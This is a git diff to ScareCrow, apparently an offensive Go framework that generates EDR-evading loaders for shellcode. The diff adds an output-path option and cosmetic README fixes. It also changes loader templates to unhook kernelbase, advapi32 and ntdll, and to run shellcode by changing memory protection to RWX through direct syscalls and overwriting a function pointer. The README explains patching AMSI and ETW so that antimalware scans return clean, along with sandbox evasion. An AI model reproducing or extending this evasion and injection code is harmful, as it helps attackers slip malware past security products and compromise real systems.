diff --git a/Loader/Loader.go b/Loader/Loader.go index e5f1089..5a44352 100644 --- a/Loader/Loader.go +++ b/Loader/Loader.go @@ -712,7 +712,11 @@ func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string, } if sandbox == true { - Binary.Variables["SandboxOS"] = `"os"` + if console == true { + Binary.Variables["SandboxOS"] = "" + } else { + Binary.Variables["SandboxOS"] = `"os"` + } Binary.Variables["IsDomainJoined"] = Cryptor.VarNumberLength(10, 19) Binary.Variables["domain"] = Cryptor.VarNumberLength(10, 19) Binary.Variables["status"] = Cryptor.VarNumberLength(10, 19) @@ -865,7 +869,7 @@ func Shellcode_Buff(b64ciphertext string, b64key string, b64iv string, FuncName } -func JScriptLoader_Buff(name string, filename string, mode string, sandbox bool) (string, string, string) { +func JScriptLoader_Buff(name string, filename string, mode string, sandbox bool, CommandLoader string) (string, string, string) { var LoaderTemplate string var buffer bytes.Buffer JScriptLoader := &JScriptLoader{} @@ -897,6 +901,11 @@ func JScriptLoader_Buff(name string, filename string, mode string, sandbox bool) JScriptLoader.Variables["dllext"] = ".dll" JScriptLoader.Variables["filename"] = filename JScriptLoader.Variables["FileName"] = name + if CommandLoader == "hta" { + JScriptLoader.Variables["System32"] = "Sysnative" + } else { + JScriptLoader.Variables["System32"] = "System32" + } } if mode == "wscript" { JScriptLoader.Variables["dllext"] = ".dll" @@ -1126,7 +1135,7 @@ func CompileFile(b64ciphertext string, b64key string, b64iv string, mode string, Utils.ModuleObfuscator(name, FuncName) return name, filename } -func CompileLoader(mode string, outFile string, filename string, name string, CommandLoader string, URL string, sandbox bool, Sha bool) { +func CompileLoader(mode string, outFile string, filename string, name string, CommandLoader string, URL string, sandbox bool, Sha bool, path string) { if mode == "excel" { os.Rename(name+".dll", name+".xll") } else if mode == "control" { @@ -1140,6 +1149,9 @@ func CompileLoader(mode string, outFile string, filename string, name string, Co outFile = name + ".cpl" Utils.Command(URL, CommandLoader, outFile) } + if path != "" { + Utils.FileMover(name, path) + } return } } else if mode == "wscript" { @@ -1150,6 +1162,9 @@ func CompileLoader(mode string, outFile string, filename string, name string, Co os.Chdir("..") os.Rename(name+"/"+name+".exe", name+".exe") os.RemoveAll(name) + if path != "" { + Utils.FileMover(name, path) + } fmt.Println("[+] Binary Compiled") if CommandLoader == "bits" { outFile = name + ".exe" @@ -1162,10 +1177,13 @@ func CompileLoader(mode string, outFile string, filename string, name string, Co os.RemoveAll(name) fmt.Println("[+] DLL Compiled") fmt.Println("[!] Note: Loading a dll (with Rundll32 or Regsvr32) that has the same name as a valid system DLL will cause problems, in this case its best to change the name slightly") + if path != "" { + Utils.FileMover(name, path) + } return } fmt.Println("[*] Creating Loader") - code, fso, dropPath := JScriptLoader_Buff(name, filename, mode, sandbox) + code, fso, dropPath := JScriptLoader_Buff(name, filename, mode, sandbox, CommandLoader) f, _ := os.Open(filename) reader := bufio.NewReader(f) content, _ := ioutil.ReadAll(reader) @@ -1195,5 +1213,8 @@ func CompileLoader(mode string, outFile string, filename string, name string, Co Utils.Sha256(outFile) } os.RemoveAll(name) + if path != "" { + Utils.FileMover(outFile, path) + } fmt.Println("[+] Loader Compiled") } diff --git a/README.md b/README.md index 75807b1..7e75465 100644 --- a/README.md +++ b/README.md @@ -44,7 +44,7 @@ Files that are signed with code signing certificates are often put under less sc With these files and the go code, ScareCrow will cross compile them into DLLs using the c-shared library option. Once the DLL is compiled, it is obfuscated into a broken base64 string that will be embedded into a file. This allows for the file to be remotely pulled, accessed, and programmatically executed. -## Requirments +## Requirements ScareCrow now requires golang 1.16.1 or later to compile loaders. If you are running an older version please to version 1.16.1 or later. See for new versions: https://golang.org/dl/. @@ -71,7 +71,7 @@ Then build it ``` go build ScareCrow.go ``` -In addition ScareCrow utlizes [Garble](https://github.com/burrowers/garble) for obfuscating all loaders. +In addition ScareCrow utilizes [Garble](https://github.com/burrowers/garble) for obfuscating all loaders. Note: Several of the dependencies do not play well on Windows when compiling, because of this it is recommended to compile your loaders on OSX or Linux. @@ -107,8 +107,6 @@ Usage of ./ScareCrow: [*] wscript - Loads into WScript process using a JScript loader. (default "binary") -O string Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required. - -Sha256 - Provides the SHA256 value of the loaders (This is useful for tracking) -configfile string The path to a json based configuration file to generate custom file attributes. This will not use the default ones. -console @@ -128,10 +126,14 @@ Usage of ./ScareCrow: Disables the ETW patching that prevents ETW events from being generated. -nosleep Disables the sleep delay before the loader unhooks and executes the shellcode. + -outpath string + The path to put the final Payload/Loader once it's compiled. -password string The password for code signing cert. Required when -valid is used. -sandbox - Enables sandbox evasion using IsDomainedJoined calls. + Enables sandbox evasion using IsDomainJoined calls. + -sha256 + Provides the SHA256 value of the loaders (This is useful for tracking) -unmodified When enabled will generate a DLL loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls (set to false by default) -url string @@ -164,7 +166,7 @@ This option can be used with any of the loader options. To enable process inject ## AMSI & ETW Bypass ScareCrow contains the ability to patch AMSI (Antimalware Scan Interface) and ETW functions, preventing any event from being generated by the process. -AMSI is a Windows native API that allows Windows Defender (or other antimalware products) to interface deep in the Windows operating system and provide enhanced protection, specifically around in-memory-based attacks. AMSI allows security products to better detect malicious indicators and help stop threats. Since AMSI is native to Windows products don't need to "hook" AMSI rather they load the nesscary DLL to in order to gain enahnced insight into the process. Because of this ScareCrow loads the AMSI.dll dll and then patches, to ensure that any results from the scanning interface come back clean. Patching AMSI is default in all loaders, if you wish to not patch AMSI use the `-noamsi` command-line option to disable it in your loader. +AMSI is a Windows native API that allows Windows Defender (or other antimalware products) to interface deep in the Windows operating system and provide enhanced protection, specifically around in-memory-based attacks. AMSI allows security products to better detect malicious indicators and help stop threats. Since AMSI is native to Windows products don't need to "hook" AMSI rather they load the necessary DLL to in order to gain enhanced insight into the process. Because of this ScareCrow loads the AMSI.dll dll and then patches, to ensure that any results from the scanning interface come back clean. Patching AMSI is default in all loaders, if you wish to not patch AMSI use the `-noamsi` command-line option to disable it in your loader. ETW utilizes built-in Syscalls to generate this telemetry. Since ETW is also a native feature built into Windows, security products do not need to "hook" the ETW syscalls to gain the information. As a result, to prevent ETW, ScareCrow patches numerous ETW syscalls, flushing out the registers and returning the execution flow to the next instruction. Patching ETW is now default in all loaders, if you wish to not patch ETW use the `-noetw` command-line option to disable it in your loader. diff --git a/ScareCrow.go b/ScareCrow.go index 8cc3db8..fcd368c 100644 --- a/ScareCrow.go +++ b/ScareCrow.go @@ -36,6 +36,7 @@ type FlagOptions struct { refresher bool sandbox bool sleep bool + path string } func options() *FlagOptions { @@ -63,10 +64,11 @@ func options() *FlagOptions { ProcessInjection := flag.String("injection", "", "Enables Process Injection Mode and specify the path to the process to create/inject into (use \\ for the path).") configfile := flag.String("configfile", "", "The path to a json based configuration file to generate custom file attributes. This will not use the default ones.") valid := flag.String("valid", "", "The path to a valid code signing cert. Used instead -domain if a valid code signing cert is desired.") - sandbox := flag.Bool("sandbox", false, `Enables sandbox evasion using IsDomainedJoined calls.`) + sandbox := flag.Bool("sandbox", false, `Enables sandbox evasion using IsDomainJoined calls.`) sleep := flag.Bool("nosleep", false, `Disables the sleep delay before the loader unhooks and executes the shellcode.`) + path := flag.String("outpath", "", "The path to put the final Payload/Loader once it's compiled.") flag.Parse() - return &FlagOptions{outFile: *outFile, inputFile: *inputFile, URL: *URL, LoaderType: *LoaderType, CommandLoader: *CommandLoader, domain: *domain, password: *password, configfile: *configfile, console: *console, AMSI: *AMSI, ETW: *ETW, Sha: *Sha, ProcessInjection: *ProcessInjection, refresher: *refresher, valid: *valid, sandbox: *sandbox, sleep: *sleep} + return &FlagOptions{outFile: *outFile, inputFile: *inputFile, URL: *URL, LoaderType: *LoaderType, CommandLoader: *CommandLoader, domain: *domain, password: *password, configfile: *configfile, console: *console, AMSI: *AMSI, ETW: *ETW, Sha: *Sha, ProcessInjection: *ProcessInjection, refresher: *refresher, valid: *valid, sandbox: *sandbox, sleep: *sleep, path: *path} } func execute(opt *FlagOptions, name string) string { @@ -85,8 +87,7 @@ func execute(opt *FlagOptions, name string) string { name = limelighter.FileProperties(name, opt.configfile) } if opt.LoaderType == "binary" { - cmd = exec.Command(bin, "GOOS=windows", "GOARCH=amd64", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "../.lib/garble", "-seed=random", "build", "-a", "-trimpath", "-ldflags", "-w -s -buildid=", "-o", ""+name+".exe") - + cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "../.lib/garble", "-seed=random", "build", "-a", "-trimpath", "-ldflags", "-w -s -buildid=", "-o", ""+name+".exe") } else { cwd, err := os.Getwd() if err != nil { @@ -220,6 +221,6 @@ func main() { fmt.Println("[+] Shellcode Encrypted") name, filename := Loader.CompileFile(b64ciphertext, b64key, b64iv, opt.LoaderType, opt.outFile, opt.refresher, opt.console, opt.sandbox, opt.ETW, opt.ProcessInjection, opt.sleep, opt.AMSI) name = execute(opt, name) - Loader.CompileLoader(opt.LoaderType, opt.outFile, filename, name, opt.CommandLoader, opt.URL, opt.sandbox, opt.Sha) + Loader.CompileLoader(opt.LoaderType, opt.outFile, filename, name, opt.CommandLoader, opt.URL, opt.sandbox, opt.Sha, opt.path) } diff --git a/Struct/Struct.go b/Struct/Struct.go index 8075939..2850d03 100644 --- a/Struct/Struct.go +++ b/Struct/Struct.go @@ -196,7 +196,7 @@ func JS_Control_Sub() string { func JS_Msiexec_Sub() string { return ` var {{.Variables.objShell}} = new ActiveXObject("she"+"ll.appl"+"ication"); - {{.Variables.objShell}}.ShellExecute("C:\\Windows\\Sysnative\\msiexec.exe", "/z "+{{.Variables.dropPath}}+"\\{{.Variables.FileName}}{{.Variables.dllext}}", "", "", 1); + {{.Variables.objShell}}.ShellExecute("C:\\Windows\\{{.Variables.System32}}\\msiexec.exe", "/z "+{{.Variables.dropPath}}+"\\{{.Variables.FileName}}{{.Variables.dllext}}", "", "", 1); ` } @@ -369,6 +369,9 @@ func DLL_Refresher() string { err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', 'b', 'a', 's', 'e', '.', 'd', 'l', 'l'})) if err != nil { } + err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'a', 'd', 'v', 'a', 'p', 'i', '3', '2', '.', 'd', 'l', 'l'})) + if err != nil { + } err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l'})) if err != nil { } @@ -571,6 +574,10 @@ func Binary() string { if err != nil { {{.Variables.RefreshPE}} } + err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'a', 'd', 'v', 'a', 'p', 'i', '3', '2', '.', 'd', 'l', 'l'})) + if err != nil { + {{.Variables.RefreshPE}} + } err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l'})) if err != nil { {{.Variables.RefreshPE}} @@ -594,19 +601,41 @@ func Binary() string { {{.Variables.Pointer}} {{.Variables.raw_bin}} := [loader].{{.Variables.FuncName}}() {{.Variables.ShellcodeString}} - var {{.Variables.phandle}} uint64 - var {{.Variables.baseA}}, {{.Variables.zerob}}, {{.Variables.alloctype}}, {{.Variables.protect}} uintptr - {{.Variables.phandle}} = 0xffffffffffffffff - {{.Variables.regionsizep}} := len({{.Variables.raw_bin}}) - {{.Variables.regionsize}} := uintptr({{.Variables.regionsizep}}) - {{.Variables.protect}} = 0x40 - {{.Variables.alloctype}} = 0x3000 - {{.Variables.ptr}} := [loader].[Allocate]({{.Variables.customsyscall}}, {{.Variables.phandle}}, {{.Variables.baseA}}, {{.Variables.zerob}}, {{.Variables.regionsize}}, {{.Variables.alloctype}}, {{.Variables.protect}}, 0) - {{.Variables.buff}} := (*[1890000]byte)(unsafe.Pointer({{.Variables.ptr}})) - for x, y := range []byte({{.Variables.raw_bin}}) { - {{.Variables.buff}} [x] = y + {{.Variables.ptr}} := func() { } - syscall.Syscall({{.Variables.ptr}}, 0, 0, 0, 0,) + var {{.Variables.oldptrperms}} uintptr + {{.Variables.handle}} := uintptr(0xffffffffffffffff) + {{.Variables.regionsize}} := uintptr(len({{.Variables.raw_bin}})) + var {{.Variables.oldfartcodeperms}} uintptr + {{.Variables.runfunc}}, _ := [loader].[NtProtectVirtualMemoryprep]( + {{.Variables.customsyscallVP}}, + {{.Variables.handle}}, + (*uintptr)(unsafe.Pointer(&{{.Variables.ptr}})), + &{{.Variables.regionsize}}, + 0x40, + &{{.Variables.oldptrperms}}, + ) + if {{.Variables.runfunc}} != 0 { + panic("Call to VirtualProtect failed!") + } + {{.Variables.CopyPointer}} + *(**uintptr)(unsafe.Pointer(&{{.Variables.ptr}})) = (*uintptr)(unsafe.Pointer(&{{.Variables.raw_bin}})) + {{.Variables.OverwrittenShellcode}} + + {{.Variables.OverWrittenPoint}} + {{.Variables.runfunc}}, _ = [loader].[NtProtectVirtualMemoryprep]( + {{.Variables.customsyscallVP}}, + {{.Variables.handle}}, + (*uintptr)(unsafe.Pointer(&{{.Variables.raw_bin}})), + &{{.Variables.regionsize}}, + 0x40, + &{{.Variables.oldfartcodeperms}}, + ) + if {{.Variables.runfunc}} != 0 { + panic("Call to VirtualProtect failed!!!!!") + } + syscall.Syscall(**(**uintptr)(unsafe.Pointer(&{{.Variables.ptr}})),0, 0, 0, 0,) + } func {{.Variables.Reloading}}({{.Variables.DLLname}} string) error { diff --git a/Utils/Utils.go b/Utils/Utils.go index 79167c5..4f80b88 100644 --- a/Utils/Utils.go +++ b/Utils/Utils.go @@ -310,6 +310,27 @@ func Zipit(source, target string) error { return err } +func FileMover(pattern string, path string) { + var matches []string + if strings.HasSuffix(path, "/") { + } else { + path = path + "/" + } + if strings.Contains(pattern, ".") { + matches, _ = filepath.Glob(pattern + "*") + + } else { + matches, _ = filepath.Glob(pattern + ".*") + } + + if len(matches) == 0 { + fmt.Println("Error no file found") + } + filename := strings.Join(matches, " ") + os.Rename(filename, path+filename) + fmt.Println("[*] " + filename + " moved to " + path) +} + func Command(URL string, CommandLoader string, outFile string) string { if URL != "" && CommandLoader == "hta" { diff --git a/go.mod b/go.mod index 005ebed..7fbc71a 100644 --- a/go.mod +++ b/go.mod @@ -3,13 +3,13 @@ module ScareCrow go 1.17 require ( - github.com/fatih/color v1.12.0 - github.com/josephspurrier/goversioninfo v1.3.0 + github.com/fatih/color v1.13.0 + github.com/josephspurrier/goversioninfo v1.4.0 ) require ( github.com/akavel/rsrc v0.10.2 // indirect - github.com/mattn/go-colorable v0.1.8 // indirect - github.com/mattn/go-isatty v0.0.12 // indirect - golang.org/x/sys v0.0.0-20220128215802-99c3d69c2c27 // indirect + github.com/mattn/go-colorable v0.1.12 // indirect + github.com/mattn/go-isatty v0.0.14 // indirect + golang.org/x/sys v0.0.0-20220412015802-83041a38b14a // indirect ) diff --git a/go.sum b/go.sum index be3aa06..e31cf42 100644 --- a/go.sum +++ b/go.sum @@ -2,14 +2,16 @@ github.com/akavel/rsrc v0.10.2 h1:Zxm8V5eI1hW4gGaYsJQUhxpjkENuG91ki8B4zCrvEsw= github.com/akavel/rsrc v0.10.2/go.mod h1:uLoCtb9J+EyAqh+26kdrTgmzRBFPGOolLWKpdxkKq+c= github.com/davecgh/go-spew v1.1.0 h1:ZDRjVQ15GmhC3fiQ8ni8+OwkZQO4DARzQgrnXU1Liz8= github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= -github.com/fatih/color v1.12.0 h1:mRhaKNwANqRgUBGKmnI5ZxEk7QXmjQeCcuYFMX2bfcc= -github.com/fatih/color v1.12.0/go.mod h1:ELkj/draVOlAH/xkhN6mQ50Qd0MPOk5AAr3maGEBuJM= -github.com/josephspurrier/goversioninfo v1.3.0 h1:pmgDhWnG8I59p5kCR09J73s/gy9JqRPAtiaUK8jixtE= -github.com/josephspurrier/goversioninfo v1.3.0/go.mod h1:JWzv5rKQr+MmW+LvM412ToT/IkYDZjaclF2pKDss8IY= -github.com/mattn/go-colorable v0.1.8 h1:c1ghPdyEDarC70ftn0y+A/Ee++9zz8ljHG1b13eJ0s8= -github.com/mattn/go-colorable v0.1.8/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc= -github.com/mattn/go-isatty v0.0.12 h1:wuysRhFDzyxgEmMf5xjvJ2M9dZoWAXNNr5LSBS7uHXY= +github.com/fatih/color v1.13.0 h1:8LOYc1KYPPmyKMuN8QV2DNRWNbLo6LZ0iLs8+mlH53w= +github.com/fatih/color v1.13.0/go.mod h1:kLAiJbzzSOZDVNGyDpeOxJ47H46qBXwg5ILebYFFOfk= +github.com/josephspurrier/goversioninfo v1.4.0 h1:Puhl12NSHUSALHSuzYwPYQkqa2E1+7SrtAPJorKK0C8= +github.com/josephspurrier/goversioninfo v1.4.0/go.mod h1:JWzv5rKQr+MmW+LvM412ToT/IkYDZjaclF2pKDss8IY= +github.com/mattn/go-colorable v0.1.9/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc= +github.com/mattn/go-colorable v0.1.12 h1:jF+Du6AlPIjs2BiUiQlKOX0rt3SujHxPnksPKZbaA40= +github.com/mattn/go-colorable v0.1.12/go.mod h1:u5H1YNBxpqRaxsYJYSkiCWKzEfiAb1Gb520KVy5xxl4= github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU= +github.com/mattn/go-isatty v0.0.14 h1:yVuAays6BHfxijgZPzw+3Zlu5yQgKGP2/hcQbHb7S9Y= +github.com/mattn/go-isatty v0.0.14/go.mod h1:7GGIvUiUoEMVVmxf/4nioHXj79iQHKdU27kJ6hsGG94= github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= @@ -17,8 +19,10 @@ github.com/stretchr/testify v1.6.1 h1:hDPOHmpOpP40lSULcqw7IrRb/u7w6RpDC9399XyoNd github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20220128215802-99c3d69c2c27 h1:XDXtA5hveEEV8JB2l7nhMTp3t3cHp9ZpwcdjqyEWLlo= -golang.org/x/sys v0.0.0-20220128215802-99c3d69c2c27/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20210927094055-39ccf1dd6fa6/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20220412015802-83041a38b14a h1:MjZauhfFyuA8jS6CGa4rO215DgesKDIEzMSQ6mm8wW8= +golang.org/x/sys v0.0.0-20220412015802-83041a38b14a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c h1:dUUwHk2QECo/6vqA44rthZ8ie2QXMNeKRTHCNY2nXvo= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=